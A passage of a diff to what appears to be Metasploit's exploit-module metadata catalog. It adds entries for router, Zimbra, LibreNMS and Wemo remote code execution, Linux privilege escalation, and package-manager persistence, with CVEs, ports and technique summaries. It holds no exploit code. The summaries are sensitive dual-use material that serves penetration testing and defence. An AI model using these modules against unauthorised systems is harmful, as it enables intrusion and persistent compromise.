+    "description": "A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router\n         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.\n\n         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.\n         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.\n\n         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating\n          system of the affected device as a high-privilege user.\n\n        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.\n\n        Note: successful exploitation may not result in a session, and as such,\n         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.",
+    "references": [
+      "CVE-2019-1663",
+      "BID-107185",
+      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
+    ],
+    "platform": "Linux",
+    "arch": "armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Cisco RV130/RV130W < 1.0.3.45"
+    ],
+    "mod_time": "2019-04-12 14:23:57 +0000",
+    "path": "/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cisco_rv130_rmi_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ]
+    }
+  },
+  "exploit_linux/http/cisco_rv32x_rce": {
+    "name": "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
+    "full_name": "exploit/linux/http/cisco_rv32x_rce",
+    "rank": 300,
+    "disclosure_date": "2018-09-09",
+    "type": "exploit",
+    "author": [
+      "RedTeam Pentesting GmbH",
+      "Philip Huppert",
+      "Benjamin Grap"
+    ],
+    "description": "This exploit module combines an information disclosure (CVE-2019-1653)\n        and a command injection vulnerability (CVE-2019-1652) together to gain\n        unauthenticated remote code execution on Cisco RV320 and RV325 small business\n        routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n        on port 443 or HTTP on port 8007 on some older firmware versions.",
+    "references": [
+      "CVE-2019-1653",
+      "CVE-2019-1652",
+      "EDB-46243",
+      "BID-106728",
+      "BID-106732",
+      "URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export",
+      "URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8007,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "LINUX MIPS64"
+    ],
+    "mod_time": "2019-03-20 14:21:40 +0000",
+    "path": "/modules/exploits/linux/http/cisco_rv32x_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cisco_rv32x_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/http/crypttech_cryptolog_login_exec": {
    "name": "Crypttech CryptoLog Remote Code Execution",
    "full_name": "exploit/linux/http/crypttech_cryptolog_login_exec",
@@ -46995,6 +47809,50 @@
    "notes": {
    }
  },
+  "exploit_linux/http/imperva_securesphere_exec": {
+    "name": "Imperva SecureSphere PWS Command Injection",
+    "full_name": "exploit/linux/http/imperva_securesphere_exec",
+    "rank": 600,
+    "disclosure_date": "2018-10-08",
+    "type": "exploit",
+    "author": [
+      "rsp3ar <lukunming<at>gmail.com"
+    ],
+    "description": "This module exploits a command injection vulnerability in Imperva\n          SecureSphere 13.x. The vulnerability exists in the PWS service,\n          where Python CGIs didn't properly sanitize user supplied command\n          parameters and directly passes them to corresponding CLI utility,\n          leading to command injection. Agent registration credential is\n          required to exploit SecureSphere in gateway mode.\n\n          This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n          13.2 in pre-ftl mode and unsealed gateway mode.",
+    "references": [
+      "EDB-45542"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Imperva SecureSphere 13.0/13.1/13.2"
+    ],
+    "mod_time": "2019-03-05 21:57:42 +0000",
+    "path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/imperva_securesphere_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/http/ipfire_bashbug_exec": {
    "name": "IPFire Bash Environment Variable Injection (Shellshock)",
    "full_name": "exploit/linux/http/ipfire_bashbug_exec",
@@ -47273,6 +48131,53 @@
    "notes": {
    }
  },
+  "exploit_linux/http/librenms_addhost_cmd_inject": {
+    "name": "LibreNMS addhost Command Injection",
+    "full_name": "exploit/linux/http/librenms_addhost_cmd_inject",
+    "rank": 600,
+    "disclosure_date": "2018-12-16",
+    "type": "exploit",
+    "author": [
+      "mhaskar",
+      "Shelby Pace"
+    ],
+    "description": "This module exploits a command injection vulnerability in the open source\n         network management software known as LibreNMS. The community parameter used\n         in a POST request to the addhost functionality is unsanitized. This parameter\n         is later used as part of a shell command that gets passed to the popen function\n         in capture.inc.php, which can result in execution of arbitrary code.\n\n         This module requires authentication to LibreNMS first.",
+    "references": [
+      "CVE-2018-20434",
+      "URL-https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/",
+      "URL-https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d"
+    ],
+    "platform": "",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2019-06-04 12:24:00 +0000",
+    "path": "/modules/exploits/linux/http/librenms_addhost_cmd_inject.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/librenms_addhost_cmd_inject",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/http/lifesize_uvc_ping_rce": {
    "name": "LifeSize UVC Authenticated RCE via Ping",
    "full_name": "exploit/linux/http/lifesize_uvc_ping_rce",
@@ -47723,8 +48628,7 @@
    "description": "This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an\n        operating system command under the context of the web server user which is root.\n\n        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing\n        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.",
    "references": [
      "URL-https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/",
-      "CVE-2018-20323",
-      "CVE-2018-1000999"
+      "CVE-2018-20323"
    ],
    "platform": "Python,Unix",
    "arch": "python, cmd",
@@ -47748,7 +48652,7 @@
      "Python payload",
      "Command payload"
    ],
-    "mod_time": "2019-01-23 09:27:12 +0000",
+    "mod_time": "2019-04-02 12:51:09 +0000",
    "path": "/modules/exploits/linux/http/mailcleaner_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/mailcleaner_exec",
@@ -48789,7 +49693,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-03-23 19:38:14 +0000",
    "path": "/modules/exploits/linux/http/panos_readsessionvars.rb",
    "is_install_path": true,
    "ref_name": "linux/http/panos_readsessionvars",
@@ -51117,6 +52021,54 @@
    "notes": {
    }
  },
+  "exploit_linux/http/zimbra_xxe_rce": {
+    "name": "Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF",
+    "full_name": "exploit/linux/http/zimbra_xxe_rce",
+    "rank": 600,
+    "disclosure_date": "2019-03-13",
+    "type": "exploit",
+    "author": [
+      "An Trinh",
+      "Khanh Viet Pham",
+      "Jacob Robles"
+    ],
+    "description": "This module exploits an XML external entity vulnerability and a\n        server side request forgery to get unauthenticated code execution\n        on Zimbra Collaboration Suite. The XML external entity vulnerability\n        in the Autodiscover Servlet is used to read a Zimbra configuration\n        file that contains an LDAP password for the 'zimbra' account. The\n        zimbra credentials are then used to get a user authentication cookie\n        with an AuthRequest message. Using the user cookie, a server side request\n        forgery in the Proxy Servlet is used to proxy an AuthRequest with\n        the 'zimbra' credentials to the admin port to retrieve an admin\n        cookie. After gaining an admin cookie the Client Upload servlet is\n        used to upload a JSP webshell that can be triggered from the web\n        server to get command execution on the host. The issues reportedly\n        affect Zimbra Collaboration Suite v8.5 to v8.7.11.\n\n        This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64\n        UBUNTU16_64 FOSS edition.",
+    "references": [
+      "CVE-2019-9670",
+      "CVE-2019-9621",
+      "URL-https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html"
+    ],
+    "platform": "Linux",
+    "arch": "java",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-01 17:21:23 +0000",
+    "path": "/modules/exploits/linux/http/zimbra_xxe_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/zimbra_xxe_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/ids/alienvault_centerd_soap_exec": {
    "name": "AlienVault OSSIM av-centerd Command Injection",
    "full_name": "exploit/linux/ids/alienvault_centerd_soap_exec",
@@ -51251,7 +52203,7 @@
      "Tavis Ormandy",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on Fedora systems with\n        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n        as the crash handler.\n\n        A race condition allows local users to change ownership of arbitrary\n        files (CVE-2015-3315). This module uses a symlink attack on\n        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,\n        then adds a new user with UID=0 GID=0 to gain root privileges.\n        Winning the race could take a few minutes.\n\n        This module has been tested successfully on ABRT packaged version\n        2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop\n        19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.\n\n        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.",
+    "description": "This module attempts to gain root privileges on Linux systems with\n        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n        as the crash handler.\n\n        A race condition allows local users to change ownership of arbitrary\n        files (CVE-2015-3315). This module uses a symlink attack on\n        `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,\n        then adds a new user with UID=0 GID=0 to gain root privileges.\n        Winning the race could take a few minutes.\n\n        This module has been tested successfully on:\n\n        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;\n        abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;\n        abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;\n        abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;\n        abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.",
    "references": [
      "CVE-2015-3315",
      "EDB-36747",
@@ -51279,7 +52231,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-04-18 09:01:51 +0000",
    "path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/abrt_raceabrt_priv_esc",
@@ -51392,7 +52344,7 @@
      "Ricardo F. Teixeira",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on Linux systems by\n        invoking the default coredump handler inside a namespace (\"container\").\n\n        Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\n        vulnerable, due to a feature which allows forwarding reports to\n        a container's Apport by changing the root directory before loading\n        the crash report, causing 'usr/share/apport/apport' within the crashed\n        task's directory to be executed.\n\n        Similarly, Fedora is vulnerable when the kernel crash handler is\n        configured to change root directory before executing ABRT, causing\n        'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be\n        executed.\n\n        In both instances, the crash handler does not drop privileges,\n        resulting in code execution as root.\n\n        This module has been tested successfully on Apport 2.14.1 on\n        Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.",
+    "description": "This module attempts to gain root privileges on Linux systems by\n        invoking the default coredump handler inside a namespace (\"container\").\n\n        Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\n        vulnerable, due to a feature which allows forwarding reports to\n        a container's Apport by changing the root directory before loading\n        the crash report, causing `usr/share/apport/apport` within the crashed\n        task's directory to be executed.\n\n        Similarly, Fedora is vulnerable when the kernel crash handler is\n        configured to change root directory before executing ABRT, causing\n        `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be\n        executed.\n\n        In both instances, the crash handler does not drop privileges,\n        resulting in code execution as root.\n\n        This module has been tested successfully on Apport 2.14.1 on\n        Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.",
    "references": [
      "CVE-2015-1318",
      "URL-http://www.openwall.com/lists/oss-security/2015/04/14/4",
@@ -51418,7 +52370,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-04-19 17:13:57 +0000",
    "path": "/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/apport_abrt_chroot_priv_esc",
@@ -51428,6 +52380,41 @@
    "notes": {
    }
  },
+  "exploit_linux/local/apt_package_manager_persistence": {
+    "name": "APT Package Manager Persistence",
+    "full_name": "exploit/linux/local/apt_package_manager_persistence",
+    "rank": 600,
+    "disclosure_date": "1999-03-09",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the package manager is used. No\n        handler is ran automatically so you must configure an appropriate\n        exploit/multi/handler to connect. This module creates a pre-invoke hook\n        for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
+    "references": [
+
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-26 13:11:40 +0000",
+    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/apt_package_manager_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/local/asan_suid_executable_priv_esc": {
    "name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
    "full_name": "exploit/linux/local/asan_suid_executable_priv_esc",
@@ -51828,7 +52815,7 @@
      "Tavis Ormandy",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n        glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not\n        properly restrict use of the LD_AUDIT environment variable when loading\n        setuid executables which allows control over the $ORIGIN library search\n        path resulting in execution of arbitrary shared objects.\n\n        This module opens a file descriptor to the specified suid executable via\n        a hard link, then replaces the hard link with a shared object before\n        instructing the linker to execute the file descriptor, resulting in\n        arbitrary code execution.\n\n        The specified setuid binary must be readable and located on the same\n        file system partition as the specified writable directory.\n\n        This module has been tested successfully on glibc version 2.5 on CentOS\n        5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).\n\n        RHEL 5 is reportedly affected, but untested. Some versions of ld.so,\n        such as the version shipped with Ubuntu 14, hit a failed assertion\n        in dl_open_worker causing exploitation to fail.",
+    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n        glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not\n        properly restrict use of the `LD_AUDIT` environment variable when loading\n        setuid executables which allows control over the `$ORIGIN` library search\n        path resulting in execution of arbitrary shared objects.\n\n        This module opens a file descriptor to the specified suid executable via\n        a hard link, then replaces the hard link with a shared object before\n        instructing the linker to execute the file descriptor, resulting in\n        arbitrary code execution.\n\n        The specified setuid binary must be readable and located on the same\n        file system partition as the specified writable directory.\n\n        This module has been tested successfully on:\n\n        glibc 2.5 on CentOS 5.4 (x86_64);\n        glibc 2.5 on CentOS 5.5 (x86_64);\n        glibc 2.12 on Fedora 13 (i386); and\n        glibc 2.5-49 on RHEL 5.5 (x86_64).\n\n        Some versions of `ld.so`, such as the version shipped with Ubuntu 14,\n        hit a failed assertion in `dl_open_worker` causing exploitation to fail.",
    "references": [
      "CVE-2010-3847",
      "BID-44154",
@@ -51852,7 +52839,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-04-18 15:35:37 +0000",
    "path": "/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/glibc_origin_expansion_priv_esc",
@@ -52484,7 +53471,8 @@
    "disclosure_date": "1983-01-01",
    "type": "exploit",
    "author": [
-      "h00die <mike@shorebreaksecurity.com>"
+      "h00die <mike@shorebreaksecurity.com>",
+      "Cale Black"
    ],
    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n            System V:\n              CentOS <= 5\n              Debian <= 6\n              Kali 2.0\n              Ubuntu <= 9.04\n            Upstart:\n              CentOS 6\n              Fedora >= 9, < 15\n              Ubuntu >= 9.10, <= 14.10\n            systemd:\n              CentOS 7\n              Debian >= 7, <=8\n              Fedora >= 15\n              Ubuntu >= 15.04\n          Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
    "references": [
@@ -52503,9 +53491,10 @@
      "Auto",
      "System V",
      "Upstart",
-      "systemd"
+      "systemd",
+      "systemd user"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-06 00:07:17 +0000",
    "path": "/modules/exploits/linux/local/service_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/service_persistence",
@@ -52598,6 +53587,50 @@
    "notes": {
    }
  },
+  "exploit_linux/local/systemtap_modprobe_options_priv_esc": {
+    "name": "SystemTap MODPROBE_OPTIONS Privilege Escalation",
+    "full_name": "exploit/linux/local/systemtap_modprobe_options_priv_esc",
+    "rank": 600,
+    "disclosure_date": "2010-11-17",
+    "type": "exploit",
+    "author": [
+      "Tavis Ormandy",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module attempts to gain root privileges by exploiting a\n        vulnerability in the `staprun` executable included with SystemTap\n        version 1.3.\n\n        The `staprun` executable does not clear environment variables prior to\n        executing `modprobe`, allowing an arbitrary configuration file to be\n        specified in the `MODPROBE_OPTIONS` environment variable, resulting\n        in arbitrary command execution with root privileges.\n\n        This module has been tested successfully on:\n\n        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and\n        systemtap 1.1-3.el5 on RHEL 5.5 (x64).",
+    "references": [
+      "BID-44914",
+      "CVE-2010-4170",
+      "EDB-15620",
+      "URL-https://securitytracker.com/id?1024754",
+      "URL-https://access.redhat.com/security/cve/cve-2010-4170",
+      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=653604",
+      "URL-https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html",
+      "URL-https://bugs.launchpad.net/bugs/677226",
+      "URL-https://www.debian.org/security/2011/dsa-2348"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-04-19 12:54:30 +0000",
+    "path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/local/udev_netlink": {
    "name": "Linux udev Netlink Local Privilege Escalation",
    "full_name": "exploit/linux/local/udev_netlink",
@@ -52809,6 +53842,41 @@
    "notes": {
    }
  },
+  "exploit_linux/local/yum_package_manager_persistence": {
+    "name": "Yum Package Manager Persistence",
+    "full_name": "exploit/linux/local/yum_package_manager_persistence",
+    "rank": 600,
+    "disclosure_date": "2003-12-17",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the package manager is used. No\n        handler is ran automatically so you must configure an appropriate\n        exploit/multi/handler to connect. Module modifies a yum plugin to\n        launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\n        will show what plugins are currently enabled on the system.",
+    "references": [
+
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-30 06:25:48 +0000",
+    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/yum_package_manager_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_linux/local/zpanel_zsudo": {
    "name": "ZPanel zsudo Local Privilege Escalation Exploit",
    "full_name": "exploit/linux/local/zpanel_zsudo",
@@ -53443,7 +54511,7 @@
      "Steve Breen",
      "Dev Mohanty",
      "Louis Sato",
-      "William Vu",
+      "wvu <wvu@metasploit.com>",
      "juan vazquez <juan.vazquez@metasploit.com>",
      "Wei Chen"
    ],
@@ -53467,7 +54535,7 @@
    "targets": [
      "Jenkins 1.637"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-22 17:01:49 +0000",
    "path": "/modules/exploits/linux/misc/jenkins_java_deserialize.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/jenkins_java_deserialize",
@@ -54131,7 +55199,8 @@
    "author": [
      "midnitesnake",
      "egypt <egypt@metasploit.com>",
-      "todb <todb@metasploit.com>"
+      "todb <todb@metasploit.com>",
+      "lucipher"
    ],
    "description": "On some default Linux installations of PostgreSQL, the\n        postgres service account may write to the /tmp directory, and\n        may source UDF Shared Libraries from there as well, allowing\n        execution of arbitrary code.\n\n        This module compiles a Linux shared object file, uploads it to\n        the target host via the UPDATE pg_largeobject method of binary\n        injection, and creates a UDF (user defined function) from that\n        shared object. Because the payload is run as the shared object's\n        constructor, it does not need to conform to specific Postgres\n        API versions.",
    "references": [
@@ -54151,7 +55220,7 @@
      "Linux x86",
      "Linux x86_64"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2019-04-29 15:28:11 +0000",
    "path": "/modules/exploits/linux/postgres/postgres_payload.rb",
    "is_install_path": true,
    "ref_name": "linux/postgres/postgres_payload",
@@ -55042,7 +56111,7 @@
      "TCP (typically older devices)",
      "UDP (typically newer devices)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/exploits/linux/telnet/netgear_telnetenable.rb",
    "is_install_path": true,
    "ref_name": "linux/telnet/netgear_telnetenable",
@@ -55094,6 +56163,69 @@
    "notes": {
    }
  },
+  "exploit_linux/upnp/belkin_wemo_upnp_exec": {
+    "name": "Belkin Wemo UPnP Remote Code Execution",
+    "full_name": "exploit/linux/upnp/belkin_wemo_upnp_exec",
+    "rank": 600,
+    "disclosure_date": "2014-04-04",
+    "type": "exploit",
+    "author": [
+      "phikshun",
+      "wvu <wvu@metasploit.com>",
+      "nstarke"
+    ],
+    "description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n        the SmartDevURL argument to the SetSmartDevInfo action.\n\n        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n        devices are known to be affected, albeit on a different RPORT (49153).",
+    "references": [
+      "URL-https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/",
+      "URL-https://github.com/phikshun/ufuzz",
+      "URL-https://gist.github.com/phikshun/10900566",
+      "URL-https://gist.github.com/phikshun/9984624",
+      "URL-https://www.crock-pot.com/wemo-landing-page.html",
+      "URL-https://www.belkin.com/us/support-article?articleNum=101177",
+      "URL-http://www.wemo.com/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, mipsle",
+    "rport": 49152,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2019-04-24 11:39:34 +0000",
+    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "NOCVE": "Patched in 2.00.8643 without vendor disclosure",
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    }
+  },
  "exploit_linux/upnp/dlink_upnp_msearch_exec": {
    "name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
    "full_name": "exploit/linux/upnp/dlink_upnp_msearch_exec",
@@ -55362,7 +56494,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability,\n        discovered by Hacking Team and made public as part of the July 2015 data leak, was\n        described as an Use After Free while handling the opaqueBackground property\n        7 setter of the flash.display.DisplayObject class. This module is an early release\n        tested on:\n\n        Windows XP SP3, IE8 and Flash 18.0.0.194,\n        Windows XP SP3, IE 8 and Flash 18.0.0.203,\n        Windows XP SP3, Firefox and Flash 18.0.0.203,\n        Windows Vista SP2 + IE 9 and Flash 18.0.0.203,\n        Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n        Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\n        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n        windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194",
+    "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability,\n        discovered by Hacking Team and made public as part of the July 2015 data leak, was\n        described as an Use After Free while handling the opaqueBackground property\n        7 setter of the flash.display.DisplayObject class. This module is an early release\n        tested on:\n\n        Windows XP SP3, IE8 and Flash 18.0.0.194,\n        Windows XP SP3, IE 8 and Flash 18.0.0.203,\n        Windows XP SP3, Firefox and Flash 18.0.0.203,\n        Windows Vista SP2 + IE 9 and Flash 18.0.0.203,\n        Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n        Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,\n        Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\n        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n        windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and\n        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194\n        Windows 10 Build 10240 (32-bit) IE11, Firefox 39.0 and Adobe Flash 18.0.0.203",
    "references": [
      "CVE-2015-5122",
      "URL-https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html",
@@ -55381,7 +56513,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2019-06-03 16:17:23 +0000",
    "path": "/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/adobe_flash_opaque_background_uaf",
@@ -57214,7 +58346,7 @@
      "Tavis Ormandy",
      "wvu <wvu@metasploit.com>"
    ],
